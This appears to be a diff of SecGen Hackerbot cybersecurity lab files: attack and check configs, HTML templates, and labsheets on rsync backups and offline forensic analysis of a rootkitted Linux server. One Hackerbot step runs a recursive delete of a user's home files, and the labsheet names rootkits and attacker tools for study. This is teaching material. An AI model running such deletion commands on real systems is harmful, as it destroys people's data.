<!--check for the first set of changes (shouldn't be there)(status1), the original files (shouldn't be there)(status2), then diff1(shouldn't be there)(status3), then the diff2(shouldn't be there)(status4), then inf1 (shouldn't be there), inf2 (should be there)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; grep <%= $rand3 %> /home/<%= $main_user %>/remote-rsync-incremental2/<%= $second_user %>/personal_secrets/nothing_much > /dev/null; status5=$?; echo $status1$status2$status3$status4$status5</post_command>
<condition>
<output_matches>[1-9][1-9][1-9][1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_quiz />
</condition>
<condition>
<output_matches>[1-9][1-9][1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>0[1-9]?{2}</output_matches>
<message>:( You backed up to the correct location, but it wasn't an incremental backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include just the changes since the last backup.</message>
</else_condition>
<quiz>
<question>Access the backups via SSH. What's the contents of <%= $second_user %>/personal_secrets/nothing_much?</question>
<answer>^<%= $rand3 %>$</answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />
</quiz>
</attack>
<attack>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>I am going to attack you now!</prompt>
<post_command>rm -r /home/<%= $second_user %>/*; echo $?</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %>. You need to let this happen!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>I just deleted all <%= $second_user %>'s files! They don't call me Hackerbot for nothin'!</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the desktop server-->
<!-- topic: Rsync incremental-->
<prompt>Use all the backups (including differential and incremental) to restore all of <%= $second_user %>'s files on the desktop system</prompt>
<!--check for the first set of changes (shouldn't be there)(status1), the original files (shouldn't be there)(status2), then diff1(shouldn't be there)(status3), then the diff2(shouldn't be there)(status4), then inf1 (shouldn't be there), inf2 (should be there)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; grep <%= $rand3 %> /home/<%= $second_user %>/personal_secrets/nothing_much > /dev/null; status5=$?; grep <%= $rand3 %> /home/<%= $second_user %>/notes > /dev/null; status6=$?; echo $status1$status2$status3$status4$status5$status6</post_command>
<condition>
<output_matches>000000</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>00000</output_matches>
<message>:( Close... You restored something, but not everything... Check the order you did your restore commands in.</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>:( You restored something, but not everything...</message>
</condition>
<condition>
<output_matches>[1-9]{6}</output_matches>
<message>:( You didn't restore anything.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Restore everything...</message>
</else_condition>
</attack>
<attack>
<!--shell on the desktop server-->
<!-- topic: Rsync incremental-->
<prompt>Restore <%= $second_user %>'s notes file to it's earliest state</prompt>
<post_command>grep '<%= $first_notes %>' /home/<%= $second_user %>/notes > /dev/null; status1=$?; echo $status1</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[0-9]</output_matches>
<message>:( That's not the earliest state...</message>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
</hackerbot>

View File

@@ -0,0 +1,121 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
.markdown-body h4[id^='hackerbot']:after {
display: inline-block;
float: right;
content: url("images/skullandusb.svg");
width: 30px;
}
article {
float: right;
width: calc(100% - 300px);
}
.toc {
float: left;
font-size: smaller;
color: #1a1d22;
width: 300px;
position: fixed;
height: calc(100% - 56px);
overflow-y: scroll;
font-family: sans-serif;
margin-top: 50px;
}
.toc ul {
list-style-type: none;
padding: 0;
margin-left: 1em;
}
.toc li { /* Space between menu items*/
margin: 1em 0;
}
.toc a {
color: #1a1d22;
text-decoration: none;
}
.toc a:hover {
color: #6c036d;
text-decoration: none;
}
.toc a:visited {
color: #1a1d22;
text-decoration: none;
}
.markdown-body pre {
background-color: #570138;
color: whitesmoke;
}
.markdown-body p code span {
color: black !important;
}
.markdown-body p code {
background-color: whitesmoke;
border: 1px solid #eaecef;
}
.markdown-body img[alt="small-left"] {
max-width: 100px;
float: left;
}
.markdown-body img[alt="small-right"] {
max-width: 100px;
float: right;
}
.markdown-body img[alt="tiny-right"] {
max-width: 30px;
float: right;
}
.markdown-body img[alt="small"] {
max-width: 100px;
display: block;
margin-left: auto;
margin-right: auto;
padding: 15px;
}
mark {
background-color: white;
color: #5b29bd;
font-weight: bolder;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
min-width: 200px;
max-width: 980px;
}
.toc {
float: none;
width: 100%;
position: relative;
overflow: auto;
height: auto;
}
article {
float: none;
width: 100%;
}
}
</style>
<div class="toc">
<%= self.html_TOC_rendered %>
</div>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js?autoload=true&amp;skin=sunburst&amp;lang=css"></script>
</body>
</html>

View File

@@ -0,0 +1,6 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
![small](images/leedsbeckett-logo.png)

View File

@@ -0,0 +1,5 @@
## Resources
[http://webgnuru.com/linux/rsync\_incremental.php](http://webgnuru.com/linux/rsync_incremental.php)
[http://everythinglinux.org/rsync/](http://everythinglinux.org/rsync/)

View File

@@ -0,0 +1,219 @@
## Rsync, deltas and epoch backups
Rsync is a popular tool for copying files locally, or over a network. Rsync can use delta encoding (only sending *differences* over the network rather than whole files) to reduce the amount of data that needs to be transferred. Many commercial backup systems provide a managed frontend for `rsync`.
Note: make sure you exited SSH above, and are now running commands on your local system.
Lets start by doing a simple ==copy of your /etc/ directory== to a local copy:
```bash
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
> Note that the presence of a trailing "/" changes the behaviour, so be careful when constructing rsync commands. In this case we are copying the directory (not just its contents), into the directory etc\_backup. See the man page for more information.
Rsync reports the amount of data "sent".
Read the Rsync man page ("`man rsync`"), to ==understand the flags we have used== (`-a` and `-v`). As you will see, Rsync has a great deal of options.
Now, lets ==add a file to /etc, and repeat the backup:==
```bash
sudo bash -c 'echo hello > /etc/hello'
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
Note that only the new file was transferred (incremental) to update our epoch (full) backup of /etc/.
## Rsync remote copies via SSH with compression
Rsync can act as a server, listening on a TCP port. It can also be used via SSH, as you will see. ==Copy your /etc/ directory to your backup_server== system using Rsync via SSH:
```bash
sudo rsync -avzh --fake-super /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Tip: this is all one line
Note that this initial copy will have used less network traffic compared to `scp`, due to the `-z` flag, which tells `rsync` to use compression. ==Compare the amount of data sent== (as reported by Rsync in the previous command -- the `-h` told Rsync to use human readable sizes) to the size of the date that was sent:
```bash
sudo du -sh /etc
```
Now, if you were to ==delete a local file== that had been backed up:
```bash
sudo rm /etc/hello
```
Even if you ==re-sync your local changes== to the backup_server, the file will not be deleted from the server:
```bash
sudo rsync -avzh --fake-super /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
To recover the file, you can simply ==retrieve the backup:==
```bash
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/etc/hello /etc/
```
Note, that the `--fake-super` option is used to ensure the recovered file is still owned by root (even though it is not associated with root on the backup_server). This avoids requiring SSH root access to the remote machine (for security reasons this is not usually done) to retain ownership and so on.
==Read the man page entry for `--fake-super`==
> Hint: `man rsync`, then press '/' followed by '--fake-super$', and enter.
==Delete the file locally, and sync the changes== *including deletions* to the server so that it is also deleted there:
```bash
sudo rm /etc/hello
sudo rsync -avzh --fake-super --delete /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Note the added **`--delete`**
==Confirm that the file has been deleted== from the backup stored on the server.
> Hint: login via SSH and view the backups
==Lab book question: Compare the file access/modification times== of the scp and rsync backups, are they the same/similar? If not, why?
## Rsync incremental/differential backups
If you need to keep daily backups, it would be an inefficient use of disk space (and network traffic and/or disk usage) to simply save separate full copies of your entire backup each day. Therefore, it often makes sense to copy only the files that have changed for our daily backup. This can either be comparisons to the last backup (incremental), or last full backup (differential).
### Differential backups
==Create a new file== in /etc:
```bash
sudo bash -c 'echo "hello there" > /etc/hello'
```
And now lets ==create differential backups== of our changes to /etc (both local and remote backup copies):
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ /home/<%= $main_user %>/backups/rsync_backup_week1/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week1/
```
> The **-\-compare-dest** flag tells rsync to search these backup copies, and only copy files if they have changed since a backup. Refer the the man page for further explanation.
Look at what is contained in the differential update:
```bash
ls -la /home/<%= $main_user %>/backups/rsync_backup_week1/etc
```
Note that there are lots of empty directories, with only the files that have actually changed (in this case /etc/hello).
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "hello there!" > /etc/hi'
```
To ==make another differential backup== (saving changes since the last full backup), we just repeat the previous command(s), with a new destination directory:
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ /home/<%= $main_user %>/backups/rsync_backup_week2/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week2/
```
==Look at the contents== of your new backup. You will find it now contains your two new files. That is, all of the changes since the full backup.
==Delete a non-essential existing file== in /etc/, and our test hello file:
```bash
sudo rm /etc/wgetrc /etc/hello
```
Now ==restore from your backups== by first restoring from the full backup, then the latest differential backup ("week2"). The advantage to a differential backup, is you only need to use two commands to restore your system.
```bash
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/etc/ /etc/
sudo rsync -avz --fake-super <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-week2/etc/ /etc/
```
> This example is restoring from the remote copy. ==Try restoring from the local copy==.
### Incremental backups
The disadvantage of the above differential approach to backups, is that your daily backup gets bigger and bigger for every backup until you do another full backup. With *incremental backups* you *only store the changes since the last backup*.
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test1'
sudo bash -c 'echo "Another test change" > /etc/hello'
```
Now ==create an incremental backup== based on the last differential backup:
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_week2/ /home/<%= $main_user %>/backups/rsync_backup_monday/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-week2/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-monday/
```
==Another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test2'
```
Now ==create an incremental backup based on the last differential backup and the last incremental backup:==
```bash
#local
sudo rsync -av /etc --compare-dest=/home/<%= $main_user %>/backups/rsync_backup/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_week2/ --compare-dest=/home/<%= $main_user %>/backups/rsync_backup_monday/ /home/<%= $main_user %>/backups/rsync_backup_tuesday/
#remote
sudo rsync -avzh --fake-super /etc --compare-dest=/home/<%= $main_user %>/remote-rsync-backup/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-week2/ --compare-dest=/home/<%= $main_user %>/remote-rsync-backup-monday/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup-tuesday/
```
Now ==delete a number of files:==
```bash
sudo rm /etc/wgetrc /etc/hello /etc/test1 /etc/test2
```
==Restore /etc== by restoring from the full backup, then the last differential backup, then the first incremental backup, then the second incremental backup.
### Rsync snapshot backups
Another approach to keeping backups is to keep a snapshot of all of the files, but wherever the files have not changed, a hard link is used to point at a previously backed up copy. If you are unfamiliar with hard links, read more about them online. This approach gives users a snapshot of how the system was on a particular date, without having to have redundant full copies of files.
These snapshots can be achieved using the `--link-dest` flag. Open the Rsync man page, and read about `--link-dest`. Lets see it in action.
==Make an rsync snapshot== containing hard links to files that have not changed, with copies for files that have changed:
```bash
sudo rsync -av --delete --link-dest=/home/<%= $main_user %>/backups/rsync_backup/ /etc /home/<%= $main_user %>/backups/rsync_backup_snapshot_1
```
Rsync reports not having copied any new files, yet look at what is contained in rsync_backup_snapshot_1. It looks like a complete copy, yet is **taking up almost no extra storage space**.
==Create other changes== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test3'
sudo bash -c 'echo "Another test change" > /etc/test4'
```
And ==make a new rsync snapshot==, with copies of files that have changed:
```bash
sudo rsync -av --delete --link-dest=/home/<%= $main_user %>/backups/rsync_backup/ /etc /home/<%= $main_user %>/backups/rsync_backup_snapshot_2
```
==Delete some files==, and ==make a new differential rsync snapshot==. Although Rsync does not report a deletion, the deleted files will be absent from the new snapshot.
==Recover a file from a previous snapshot.==

View File

@@ -0,0 +1,45 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb'
class IDS < HackerbotConfigGenerator
attr_accessor :web_server_ip
attr_accessor :ids_server_ip
attr_accessor :hackerbot_server_ip
def initialize
super
self.module_name = 'Hackerbot Config Generator IDS'
self.title = 'Dead Analysis'
self.local_dir = File.expand_path('../../',__FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
self.web_server_ip = []
self.ids_server_ip = []
self.hackerbot_server_ip = []
end
def get_options_array
super + [['--web_server_ip', GetoptLong::REQUIRED_ARGUMENT],
['--ids_server_ip', GetoptLong::REQUIRED_ARGUMENT],
['--hackerbot_server_ip', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--web_server_ip'
self.web_server_ip << arg;
when '--ids_server_ip'
self.ids_server_ip << arg;
when '--hackerbot_server_ip'
self.ids_server_ip << arg;
end
end
end
IDS.new.run

View File

@@ -0,0 +1,49 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for an investigation an analysis lab</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a hackerbot for a lab.
Topics covered: Dead Analysis.</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>accounts</read_fact>
<read_fact>flags</read_fact>
<read_fact>root_password</read_fact>
<read_fact>web_server_ip</read_fact>
<read_fact>ids_server_ip</read_fact>
<read_fact>hackerbot_server_ip</read_fact>
<!--TODO: require input, such as accounts, or fail?-->
<default_input into="accounts">
<generator type="account">
<input into="username">
<value>vagrant</value>
</input>
</generator>
</default_input>
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

View File

@@ -0,0 +1,29 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
}
}
</style>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js"></script>
</body>
</html>

View File

@@ -0,0 +1,4 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.

View File

@@ -0,0 +1,405 @@
# Analysis of a Compromised System - Part 2: Offline Analysis
## Getting started
> ###==**Note: You cannot complete this lab (part 2) without having saved the evidence you collected during part 1 of the lab.**==
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot-server (leave it running, you don't log into this)
- desktop (this week's)
- desktop (last week's desktop VM, to access your evidence)
- kali (user: root, password: toor)
All of these VMs need to be running to complete the lab.
## Introduction to dead (offline) analysis
Once you have collected information from a compromised computer (as you have done in the previous lab), you can continue analysis offline. There are a number of software environments that can be used do offline analysis. We will be using Kali Linux, which includes a number of forensic tools. Another popular toolset is the Helix incident response environment, which you may want to also experiment with.
This lab reinforces what you have learned about integrity management and log analysis, and introduces a number of new concepts and tools.
## Getting our data into the analysis environment
To start, we need to ==get the evidence that has been collected in the previous lab onto an analysis system== (copy to /root/evidence on the Kali VM) that has software for analysing the evidence.
If you still have your evidence stored on last week's desktop VM, you can transfer the evidence straight out of /home/*user* to the Kali Linux system using scp:
```bash
scp -r *username-from-that-system*@*ip-address*:evidence evidence
```
> **Note the IP addresses**: run /sbin/ifconfig on last week's Desktop VM, and also run ifconfig on the Kali VM. Make a note of the two IP addresses, which should be on the same subnet (starting the same).
## Mounting the image read-only
**On Kali Linux**:
It is possible to mount the partition image directly as a [*loop device*](http://en.wikipedia.org/wiki/Loop_device), and access the files directly. However, doing so should be done with caution (and is generally a bad idea, unless you are very careful), since there is some chance that it may result in changes to your evidence, and you risk infecting the analysis machine with any malware on the system being analysed. However, this technique is worth exploring, since it does make accessing files particularly convenient.
==Create a directory to mount our evidence onto:==
```bash
mkdir /mnt/compromised
```
==Mount the image== that we previously captured of the state of the main partition on the compromised system:
```bash
mount -O ro -o loop evidence/hda1.img /mnt/compromised
```
> Troubleshooting: If you used a VMware VM in the live analysis lab, you may need to replace hda1.img with sda1.img
Confirm that you can now see the files that were on the compromised system:
```bash
ls /mnt/compromised
```
## Preparing for analysis of the integrity of files
Fortunately the "system administrator" of the Red Hat server had run a file integrity tool to generate hashes before the system was compromised. Start by saving a copy of the hashes recorded of the system when it was in a clean state...
<a href="data:<%= File.read self.templates_path + 'md5sum-url-encoded' %>">Click here to download the md5 hashes of the system before it was compromised</a>
==Save the hashes in the evidence directory of the Kali VM, name the file "md5s".==
==View the file==, to confirm all went well:
```bash
less evidence/md5s
```
> 'q' to quit
As you have learned in the Integrity Management lab, this information can be used to check whether files have changed.
## Starting Autopsy
Autopsy is a front-end for the Sleuth Kit (TSK) collection of forensic analysis command line tools. There is a version of Autopsy included in Kali Linux (a newer desktop-based version is also available for Windows).
==Create a directory== for storing the evidence files from Autopsy:
```bash
mkdir /root/evidence/autopsy
```
Start Autopsy. You can do this using the program menu. ==Click Applications / Forensics / autopsy.==
A terminal window should be displayed.
==Open Firefox, and visit [http://localhost:9999/autopsy](http://localhost:9999/autopsy)==
==Click "New Case".==
==Enter a case name==, such as "RedHatCompromised", and ==a description==, such as "Compromised Linux server", and ==enter your name==. ==Click "New Case".==
==Click the "Add Host" button.==
In section "6. Path of Ignore Hash Database", ==enter /root/linux-suspended-md5s==
==Click the "Add Host" button== at the bottom of the page
==Click "Add Image".==
==Click "Add Image File".==
For section "1. Location", ==enter /root/evidence/hda1.img==
For "2. Type", ==select "Partition".==
For "3. Import Method", ==select "Symlink".==
==Click "Next".==
==Click "Add".==
==Click "Ok".==
## File type analysis and integrity checking
Now that you have started and configured Autopsy with a new case and hash database, you can view the categories of files, while ignoring files that you know to be safe.
==Click "Analyse".==
==Click "File Type".==
==Click "Sort Files by Type".==
Confirm that "Ignore files that are found in the Exclude Hash Database" is selected.
==Click "Ok"==, this analysis takes some time.
Once complete, ==view the "Results Summary".==
The output shows that over 16000 files have been ignored because they were found in the md5 hashes ("Hash Database Exclusions"). This is good news, since what it leaves us with are the interesting files that have changed or been created since the system was in a clean state. This includes archives, executables, and text files (amongst other categories).
==Click "View Sorted Files".==
Copy the results file location as reported by Autopsy, and ==open the report in a new tab within Firefox:==
> /var/lib/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html
==Click "compress"==, to view the compressed files. You are greeted with a list of two compressed file archives, "/etc/opt/psyBNC2.3.1.tar.gz", and "/root/sslstop.tar.gz".
==Figure out what `psyBNC2.3.1.tar.gz` is used for.==
> Try using Google, to search for the file name, or part thereof.
Browse the evidence in /mnt/compromised/etc/opt (on the Kali Linux system, using a file browser, such as Dolphin) and look at the contents of the archive (in /etc/opt, and you may find that the attacker has left an uncompressed version which you can assess in Autopsy). Remember, don't execute any files from the compromised system on your analysis machine: you don't want to end up infecting your analysis machine. For this reason, it is safer to assess these files via Autopsy. ==Browse to the directory by clicking back to the Results Summary tab of Autopsy, and clicking "File Analysis"==, then browse to the files from there (in /etc/opt). Read the psyBNC README file, and ==note what this software package is used for.==
> **Help: if the README file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click each direct block link in turn to see the content of the README file. The direct block links are displayed at the bottom left-hand side of the webpage.
Next, we investigate what sslstop.tar.gz is used for. A quick Google brings up a CGSecurity.org page, which reports that this script modifies httpd.conf to disable SSL support from Apache. Interesting... Why would an attacker want to disable SSL support? This should soon become clear.
==Return the page where "compress" was accessed== (/root/evidence/autopsy/RedHatCompromised/host1/output/sorter-vol1/index.html), and ==click "exec"==. This page lists a fairly extensive collection of new executables on our compromised server.
==Make a list of all the executables that are likely trojanized.==
> Hint: for now ignore the "relocatable" objects left from compiling the PSYBNC software, and focus on "executable" files, especially those in /bin/ and /usr/bin/.
---
Refer to your previously collected evidence to ==identify whether any of the new executables were those with open ports== when live information was collected. Two of these have particularly interesting file names: `/usr/bin/smbd -D` and `/usr/bin/(swapd)`. These names are designed to be deceptive: for example, the inclusion of ` -D` is designed to trick system administrators into thinking that any processes were started with the "-D" command line argument flag.
Note that /lib/.x/ contains a number of new executables, including one called "hide". These are likely part of a rootkit.
> **Hint:** to view these files you will have to look in /mnt/compromised/lib/.x. The .x folder is a hidden folder (all folders and file in Linux that begin with a "." ar hidden files). Therefore, you will have to use the -a switch when using the ls command in a terminal or tell the graphical file manager to display hidden files ( View &gt; Show Hidden Files or Ctrl+H).
==Using Autopsy "File Analysis" mode, browse to "/lib/.x/"==. **Explicit language warning: if you are easily offended, then skip this next step.** View the contents of "install.log".
> **Hint:** you will have to click **../** to move up the directory tree until you can see the lib directory in the root directory /.
> **Help: if the install.log file did not display as expected,** click on the inode (meta) number at the right-hand side of the line containing the README file. You will need to click the direct block link to see the content of the install.log file. The direct block links are displayed at the bottom left-hand side of the webpage.
This includes the lines:
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
> \# SucKIT version 1.3b by Unseen &lt; unseen@broken.org &gt; \#
> \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
SuckIT is a rootkit that tampers with the Linux kernel directly via /dev/kmem, rather than the usual approach of loading a loadable kernel module (LKM). The lines in the log may indicate that the rootkit had troubles loading.
SuckIT and the rootkit technique is described in detail in Phrack issue 58, article 0x07 "Linux on-the-fly kernel patching without LKM"
> [*http://www.textfiles.com/magazines/PHRACK/PHRACK58*](http://www.textfiles.com/magazines/PHRACK/PHRACK58)
==Using Autopsy "File Analysis", view the file /lib/.x/.boot==
> **Help:** again you may need to view the block directly that contains the .boot file. Make a note of the file's access times, this will come in handy soon.
This shell script starts an SSH server (s/xopen), and sends an email to a specific email address to inform them that the machine is available. View the script, and ==determine what email address it will email the information to.==
Return to the file type analysis (presumably still open in an Iceweasel tab), still viewing the "exec" category, also note the presence of "adore.o". Adore is another rootkit (and worm), this one loads via an LKM (loadable kernel module).
Here is a concise description of a version of Adore:
> [*http://lwn.net/Articles/75990/*](http://lwn.net/Articles/75990/)
This system is well and truly compromised, with multiple kernel rootkits installed, and various trojanized binaries.
### Timeline analysis
It helps to reconstruct the timeline of events on the system, to get a better understanding. Software such as Sluthkit (either using the Autopsy frontend or the mactime command line tool) analyses the MAC times of files (that is, the most recent modification, most recent access, and most recent inode change[^1]) to reconstruct a sequence of file access events.
In another Firefox tab, ==visit [*http://localhost:9999/autopsy*](http://localhost:9999/autopsy), click "Open Case", "Ok", "Ok".==
==Click "File Activity Timelines".==
==Click "Create Data File".==
==Select "/1/ hda1.img-0-0 ext".==
==Click "Ok".==
==Click "Ok".==
For "5. Select the UNIX image that contains the /etc/passwd and /etc/group files", ==select "hda1.img-0-0".==
Wait while a timeline is generated.
==Click "Ok".==
Once analysis is complete, the timeline is presented. Note that the timeline starts with files accessed on Jan 01 1970.
==Click "Summary".==
A number of files are specified as accessed on Jan 01 1970. What is special about this date?
==Browse through the history.== Note that it is very detailed, and it is easy to get lost (and waste time) in irrelevant detail.
The access date you previously recorded (for "/lib/.x/.boot") was in August 2003, so this is probably a good place to start.
==Browse to August 2003 on the timeline==, and follow along:
Note that on the 6th of August it seems many files were accessed, and not altered (displayed as ".a.."[^2]). This is probably the point at which the md5 hashes of all the files on the system were collected.
On 9th August a number of config files were accessed including "/sbin/runlevel", "/sbin/ipchains", and "/bin/login". This indicates that the system was likely rebooted at this time.
On 10th August, a number of files that have since been deleted were accessed.
Shortly thereafter the inode data was changed (displayed as "..c.") for many files. Then many files owned by the *apache* user were last modified before they were deleted. The apache user goes on to access some more files, and then a number of header files (.h) were accessed, presumably in order to compile a C program from source. Directly after, some files were created, including "/usr/lib/adore", the Adore rootkit.
At 23:30:54 /root/.bash\_history and /var/log/messages were symlinked to /dev/null.
Next more header files were accessed, this time Linux kernel headers, presumably to compile a kernel module (or perhaps some code that tries to tamper with the kernel). This was followed by the creation of the SuckIT rootkit files, which we previously investigated.
Note that a number of these files are created are again owned by the "apache" user.
What does this tell you about the likely source of the compromise?
Further down, note the creation of the /root/sslstop.tar.gz file which was extracted (files created), then compiled and run. Shortly after, the Apache config file (/etc/httpd/conf/httpd.conf) was modified.
Why would an attacker, after compromising a system, want to stop SSL support in Apache?
Meanwhile the attacker has accidently created a /.bash\_history, which has not been deleted.
Further down we see wget accessed and used to download the /etc/opt/psyBNC2.3.1.tar.gz file, which we investigated earlier.
This file was then extracted, and the program compiled. This involved accessing many header (.h) files. Finally, the "/etc/opt/psybnc/psybnc.conf" file is modified, presumably by the attacker, in order to configure the behaviour of the program.
---
## Logs analysis
As you learned in the Log Management topic, the most common logging system on Unix systems is Syslog, which is typically configured in /etc/syslog.conf (or similar, such as rsyslog). Within the Autopsy File Analysis browser, ==navigate to this configuration file and view its contents.== Note that most logging is configured to go to /var/log/messages. Some security messages are logged to /var/log/secure. Boot messages are logged to /var/log/boot.log.
==Make a note of where mail messages are logged==, you will use this later:
Within Autopsy, browse to /var/log. Note that you cannot view the messages file, which would have contained many helpful log entries. Click the inode number to the right (47173):
As previously seen in the timeline, this file has been symlinked to /dev/null. If you are not familiar with /dev/null, search the Internet for an explanation.
For now, we will continue by investigating the files that are available, and later investigate deleted files.
Using Autopsy, ==view the /var/log/secure file==, and identify any IP addresses that have attempted to log in to the system using SSH or Telnet.
==Determine the country of origin for each of these connection attempts:==
> On a typical Unix system we can look up this information using the command:
```bash
whois *IP-address*
```
> (Where IP-address is the IP address being investigated).
>
> However, this may not be possible from within our lab environment, and alternatively there are a number of websites that be used (potentially from your own host PC):
>
> [*http://whois.domaintools.com/*](http://whois.domaintools.com/)
>
